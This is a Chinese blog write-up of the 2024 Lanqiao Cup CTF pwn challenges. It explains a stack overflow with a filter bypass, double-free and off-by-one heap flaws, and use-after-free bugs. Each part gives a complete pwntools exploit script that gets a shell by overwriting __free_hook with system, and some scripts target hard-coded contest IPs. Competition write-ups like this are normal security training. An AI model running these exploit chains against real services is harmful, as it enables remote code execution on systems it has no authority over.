2024蓝桥杯初赛决赛pwn题全解

已于 2024-06-04 18:47:20 修改
阅读量1.7k 收藏 19
点赞数 24
文章标签: 蓝桥杯 python
于 2024-06-04 18:31:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao78777/article/details/139448968
版权

蓝桥杯初赛决赛pwn题解

初赛

第一题

在这里插入图片描述
有system函数,并且能在bss上读入字符

而且存在栈溢出,只要过掉check函数即可
check函数中,主要是对system常规获取权限的参数,进行了过滤,用$0即可

exp:

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()

context(os='linux', arch='amd64', log_level='debug')
p = remote('', )
rl("restricted stack.\n")
pay=b'$0'
s(pay)

rl("...\n")
pay=b'a'*0x28+p64(0x0000000000400933)+p64(0x601090)+p64(0x400778)
s(pay)

sleep(0.5)
sl(b'exec 1>&0')


inter()

第二题

经典堆菜单题目
在这里插入图片描述
发现没有edit功能,考虑double free。版本为2.31 09.9

挨个分析
add函数,申请堆块部分
在这里插入图片描述
只能申请0x50大小的堆块,并且能读入0x50字节的大小内容

free部分,
free之后有置零,所以不存在uaf漏洞

在这里插入图片描述
show就是个正常打印
在这里插入图片描述

漏洞是在这个函数
在这里插入图片描述

在这里插入图片描述

没有置零关键部分,所以存在uaf漏洞,因为只能申请0x50大小的堆块,所以考虑使用fastbin的double free

具体思路:
先把tcachebin填满
之后利用后门函数free一个进fastbin,然后正常再free两个堆块(第二次free的是后门free的那一个)
以此构造出double free,然后把tcache bin全部申请回来,然后再申请一个fastbin的堆块,fastbin的其他堆块就会进入到tcache bin里,因为前面已经构造了double free,所以这次可以修改fd的末位,然后就能申请出来这个错位的堆块A,修改堆块的size,然后free进unsorted bin,之后申请一个小块B,泄露libc,然后free这个小块B,再free小块A(A需要提前伪造好size位)然后申请回来A,把B的fd改为free hook,然后打free hook为system即可

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('',)
libc = ELF('./libc.so.6')

def add(c):
	rl("4.exit\n")
	sl(str(1))
	sleep(0.2)
	s(c)

def free(i):
	rl("4.exit\n")
	sl(str(2))
	sleep(0.2)
	sl(str(i))

def show(i):
	rl("4.exit\n")
	sl(str(3))
	sleep(0.2)
	sl(str(i))

def free2(i):
	rl("4.exit\n")
	sl(str(0x202405))
	sleep(0.5)
	sl(str(i))

add(b'\x00'*0x38+p64(0x61))
add(b'\x00'*0x28+p64(0x61))
for i in range(12):
	add(b'a') #为伪造size做准备
for i in range(7):
	free(i+2)
free(9)
free(10)
free2(0)
free(1)
free(0)
for i in range(7):
	add(b'a')
add(b'\x30')
add(b'a')
add(b'a')
add(b'\x00'*0x28+p64(0x421)) #修改size位
free(6)
add(b'a')
show(6)
libc_base=get_addr()-0x1ecf61
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
li(hex(free_hook))
system,bin=get_sb()
free(11)
free(6)
free(10)
add(b'\x00'*0x28+p64(0x61)+p64(free_hook)) #修改fd位
add(b'/bin/sh\x00')
add(p64(system))
free(10)

inter()

哪里不明白,调试调试就行了

决赛

getting_started

比赛的时候,先看的这个题目,本地打通的了,远程打不通,这个随机值纯看脸,我脸黑,重开靶机10次左右,才打通,但是没血了

以时间为种子产生随机值
在这里插入图片描述

然后就是一个栈溢出
在这里插入图片描述

这个开启pie了,并且没法泄露东西,所以就正常输入随机值了
之后就是一个菜单题目
在这里插入图片描述
add函数,最大申请0x100的堆块
在这里插入图片描述

漏洞在edit里
在这里插入图片描述

在这里插入图片描述

这是先读入后判断,所以存在off by one,实际还有个null
思路就是利用off by one修改size,构造堆块重叠

利用思路
因为堆块限制的不强,所以直接free满tc,进入unsorted,之后再申请回来一部分,然后show出来libc
然后,off by one构造堆块重叠,利用重叠的堆块,修改fd,申请到free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr1():
    return u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('39.106.48.123', 22289)
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')

def add(idx,size):
	rl(":")
	sl(str(1))
	rl("Index: ")
	sl(str(idx))
	rl("Size ")
	sl(str(size))

def edit(idx,c):
	rl(":")
	sl(str(2))
	rl("Index: ")
	sl(str(idx))
	rl("Content: ")
	s(c)

def show(idx):
	rl(":")
	sl(str(3))
	rl("Index: ")
	sl(str(idx))

def free(idx):
	rl(":")
	sl(str(4))
	rl("Index: ")
	sl(str(idx))



libc = cdll.LoadLibrary('./libc-2.27.so')
seed =libc.time(0)
srand = libc.srand(seed)

a=[0,0,0,0,0,0,0,0,0,0]
for i in range(7):
	a[i]=int(str(libc.rand()% 80 + 32).encode())
rl("please login >>>>\n")
pay=p8(a[0])+p8(a[1])+p8(a[2])+p8(a[3])+p8(a[4])+p8(a[5])+p8(a[6])
sl(pay)


libc=ELF("./libc-2.27.so")

for i in range(10):
	add(i,0x90)
for i in range(7):
	free(i)

free(7)
show(7)
for i in range(7):
	add(i,0x90)
add(7,0x20)
show(7)
libc_base=get_addr()-0x3ebd30
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()
for i in range(11):
	add(i+10,0x68)

edit(17,b'a'*0x68+p8(0xe1))
free(18)
free(19)
add(18,0xd8)
edit(18,b'a'*0x68+p64(0x71)+p64(free_hook)+b'\n')
add(27,0x68)
edit(27,b'/bin/sh\x00\n')
add(28,0x68)
edit(28,p64(system)+b'\n')
free(27)


inter()

babyheap

同样也是4个功能
在这里插入图片描述

申请给限制到0-0x60
在这里插入图片描述

有个后门可以申请一个大堆块
在这里插入图片描述
free函数中存在uaf漏洞
在这里插入图片描述

这个题目和初赛的第二题有点像,这个题目更好布置堆块
也是通过double free,修改fd的末位,不过这个要小布置一下堆块,因为这个edit会在末位填上null,申请出来错位的堆块A,修改一下size,free进unsorted,然后show出libc,取出来这个堆块(A包含的堆块),free进tc里,通过A修改它的fd为free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99',23464)
elf = ELF('./pwn')
libc=ELF("./libc.so.6")

def add(idx,size):
	rl(">> \n")
	sl(str(1))
	rl("index: \n")
	sl(str(idx))
	rl("size: ")
	sl(str(size))
	
def free(idx):
	rl(">> \n")
	sl(str(2))
	rl("index: \n")
	sl(str(idx))

def edit(idx,c):
	rl(">> \n")
	sl(str(3))
	rl("index: \n")
	sl(str(idx))
	rl("contents: \n")
	s(c)

def show(idx):
	rl(">> \n")
	sl(str(4))
	rl("index: \n")
	sl(str(idx))
def add2(size):
	rl(">> \n")
	sl(str(555))
	rl("find me\n")
	sl(str(size))


add(0,0x60)
add(1,0x60)
add2(0x400)
add(2,0x60)

free(1)
free(0)
edit(0,b'\n')
add(3,0x60)
add(4,0x60)
edit(4,p64(0)+p64(0x481)+b'\n')
free(1)
show(1)
libc_base=get_addr()-96-0x10-libc.sym['__malloc_hook']
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()


add(5,0x60)
free(2)
free(5)
edit(4,p64(0)+p64(0x71)+p64(free_hook)+b'\n')
add(6,0x60)
edit(6,b'/bin/sh\x00\n')
add(7,0x60)
edit(7,p64(system)+b'\n')
free(6)

	
inter()
绿 宝 石
关注
[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)
2301_79326813的博客
04-27 836
查看保护查看ida这里有一次栈溢出,并且目给了我们system函数。这里的知识点没有那么复杂。
[蓝桥杯2024]-PWN:ezheap解析(堆glibc2.31,glibc2.31下的double free)
2301_79326813的博客
05-03 1048
查看保护查看ida大致就是只能创建0x60大小的堆块,并且uaf只能利用一次。
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
PWN-
2301_79215333的博客
02-20 938
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用栈溢出令返回地址指向该函数地址即可。
pwn入门-buu刷第二页解(32道)(更新完毕,下一章见)
2303_79366759的博客
03-21 1294
通过控制返回地址来执行程序执行流的变化,也即是说我们并不是在执行我们写入在bss段的代码,因为真正的代码不是写作bss段的,应该位于text段。OK那我们接着讲,我们可以在s的地址里写入ret2libc的代码,然后执行它,泄露libc的基地址后再跳转回来,再用one_gadget来getshell,之前已经写过一道栈迁移的目了,所以在这里就不多加赘述了。由代码易知,这个函数的功能是先搜索flag.txt文件,如果找到了则打印出来,如果没找到则退出程序,再看一下vuln函数里面有什么。
2022NewStarCTF pwn大部分
m0_51251108的博客
11-18 2083
今年9~10月的比赛,目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
Hitcon 2016 Pwn学习
weixin_30553777的博客
04-26 309
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的。写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的CTF,Hitcon的目内容更新,往往会出现一些以前从未从目中出现过的姿势。同时观察一些CTF也可以发现,往往都是国外以及台湾的CTF中首先出现的姿势,然后一段时间后才会被国内的CTF学习到。 此次...
DASCTF2024八月-pwn部分
qq_41683953的博客
08-24 656
DASCTF2024八月开学季,PWN,clock,randArray
2024NKCTF-pwn
03-25
2024NKCTF_pwn
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
[2024领航杯] Pwn方向解 babyheap
susu_xiaosu的博客
10-14 1296
​ 当然这个比赛我没有参加,是江苏省的一个比赛,附件是XiDP师傅在比赛结束之后发给我的,最近事情有点多,当时搁置了一天,昨天下午想起来这个事情,才开始看目,XiDP师傅说是2.35版本的libc,确实高版本libc的却棘手,我经验太浅了调试半天,最后让我们一起看一下这个目。 ​
攻防世界PWNpwn11
seaaseesa的博客
02-09 742
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
2024第十五届蓝桥杯 C/C++B组真
热门推荐
qq_45856614的博客
04-18 1万+
第十五届蓝桥杯C/C++B组真
做的第一道pwn
LL021101的博客
03-20 1422
步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
2024年第十五届蓝桥杯C/C++C组全解首发(AK)
Rrong的博客
05-01 6720
2024年第十五届蓝桥杯C/C++C组全解(首发 AK FROM DashOJ)
i春秋30强挑战赛pwn过程
07-01 571
80pts: 栈溢出,gdb调试发现发送29控制eip,nx:disabled,所以布置好shellcode后getshell from pwn import * #p=process('./tc1') p=remote('106.75.9.11',20000) nop='\x90'*19 buf='\x31\xc0\x50\x68\x2f\x2f\x73\x68...
强网杯2022 pwn解析——yakagame
CoLin的pwn小屋
07-31 3576
强网杯2022-pwn yakagame write-up
2024全国大学生信息安全竞赛(ciscn)半决赛(华南赛区)Pwn
返璞归真的博客
06-14 1245
2024全国大学生信息安全竞赛(ciscn)半决赛(华南赛区)Pwn
记一次院赛CTF的Pwn和Misc(入门)
CTF小白的博客
04-14 3452
目录Pwneasy pwn莽撞人反向读取Miscdrop the beats拼东东消失的50px Pwn 见到别的比赛的pwn才幡然醒悟,已经没有比这些更简单的pwn了。 easy pwn 首先,拿到Pwn的第一步,看是64位还是32位 第二步 gdb看开了哪些保护 【1】Canary:Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(3...
蓝桥杯嵌入式pwn捕获
最新发布
03-04
### 关于蓝桥杯竞赛中嵌入式PWN捕获技术细节 #### 捕获技术概述 在处理蓝桥杯中的嵌入式PWN目时,通常涉及对二进制文件漏洞的挖掘和利用。这类挑战主要集中在栈溢出、堆溢出以及格式化字符串等常见漏洞上[^1]。 #### 利用技巧实例分析 对于特定类型的攻击向量,如命令转义,在某些情况下可以通过精心构造输入来绕过程序的安全机制并执行任意指令。例如,在给定条件下通过发送特殊字符序列至目标进程实现系统调用`system('sh')`从而获得shell访问权限[^2]: ```python from pwn import* p = process('./pwn') pop_rdi = 0x400933 info = 0x601090 system = 0x400778 payload = b"cat flag 1>&2" print(len(payload)) payload = payload.ljust(0xe, b'\x00') p.sendafter(b'restricted stack.', payload) # 构造ROP链用于触发system函数读取flag文件内容 payload = b'a' * 0x28 + p64(pop_rdi) + p64(info) + p64(system) p.sendafter(b'...', payload) p.interactive() ``` 此代码片段展示了如何使用Python脚本配合pwntools库完成一次简单的Rop Chain构建过程,并最终实现了远程代码执行的效果。 #### 加载依赖项错误排除指南 当尝试导入必要的第三方包(比如`fcntl`)遇到困难时,这可能是由于环境配置不当引起的。为了确保能够顺利运行上述示例以及其他类似的exploit开发工作,建议先确认已安装所有必需软件包;如果仍然存在问,则可以考虑调整项目结构或虚拟环境中缺少的关键组件版本兼容性设置[^3]。 #### 处理Heap相关问的方法论探讨 针对更复杂的场景——特别是那些涉及到动态内存分配管理器内部运作原理的任务而言,掌握Glibc不同版本之间的差异至关重要。以双次释放(Double Free)为例说明:通过对对象生命周期的有效控制加上适当的信息泄露手段,便能成功推断出heap布局进而实施精确打击[^4]: ```python for i in range(3): alloc(b'a') for i in range(2, 0, -1): free(i) alloc(b'a') show(1) p.recvuntil(b'a') heapbase = (u64(p.recv(5).ljust(8, b'\x00')) << 8) - 0x300 ``` 这段代码旨在展示一种可能的方式去计算heap起始位置,这对于后续操作非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值